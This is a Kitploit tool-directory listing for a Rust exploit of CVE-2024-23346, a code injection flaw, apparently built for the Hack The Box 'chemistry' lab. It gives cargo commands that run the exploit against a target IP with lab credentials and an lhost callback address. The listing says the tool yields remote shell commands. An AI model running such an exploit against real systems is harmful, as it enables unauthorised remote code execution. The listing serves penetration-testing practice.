Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-23346-rust-exploit — A Rust exploit for CVE-2024-23346 that functions as a "terminal" (tested on chemistry.htb) | Kitploit
Tools/GitHubGitHub/szyth/cve-2024-23346-rust-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubszyth/cve-2024-23346-rust-exploit

CVE-2024-23346-rust-exploit

A Rust exploit for CVE-2024-23346 that functions as a "terminal" (tested on chemistry.htb)

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

A Rust exploitation script for CVE-2024-23346.

As shown below the POC uses the code injection vulnerability and runs remote shell commands like in a Terminal.

poc.webm


Steps to run the exploit:

  • Run directly with Cargo
    • cargo run -- --help
    • cargo run -- --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19

OR

  • Compile the Binary: cargo build -r (binary will be in target/release/poc)
  • Run the Binary:
    • ./poc --help
    • ./poc --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19

Exploit script is inspired from Python Scripting Expert MAWK0235

Download Tool